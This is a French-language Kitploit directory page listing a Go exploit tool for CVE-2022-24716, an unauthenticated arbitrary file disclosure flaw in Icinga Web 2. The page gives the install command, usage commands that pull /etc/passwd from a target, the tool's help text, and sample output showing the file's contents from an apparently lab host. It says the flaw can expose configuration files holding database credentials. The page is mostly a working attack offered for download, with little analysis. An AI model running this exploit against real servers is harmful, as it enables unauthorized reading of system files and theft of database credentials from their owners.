Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-24716-2 — CVE-2022-24716 (Divulgation arbitraire de fichiers Icingaweb2) | Kitploit
Outils/GitHubGitHub/gmh5225/cve-2022-24716-2
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubgmh5225/cve-2022-24716-2

CVE-2022-24716-2

CVE-2022-24716 (Divulgation arbitraire de fichiers Icingaweb2)

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-24716

Icinga Web 2 est une interface web de surveillance open source, un framework et une interface en ligne de commande. Des utilisateurs non authentifiés peuvent divulguer le contenu de fichiers système locaux accessibles depuis le serveur web, y compris les fichiers de configuration d'icingaweb2 contenant les identifiants de base de données.

  • Installation
  • Utilisation
  • Exécution de CVE-2022-24716

Installation

CVE-2022-24716 nécessite golang et pour le télécharger, il suffit d'utiliser :

root@kitploit:~
go install -v github.com/joaoviictorti/CVE-2022-24716@latest

Utilisation

root@kitploit:~
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

Ceci affichera l'aide de l'outil. Voici tous les paramètres qu'il supporte :

root@kitploit:~
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy

Exécution de CVE-2022-24716

root@kitploit:~
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
Télécharger l’outil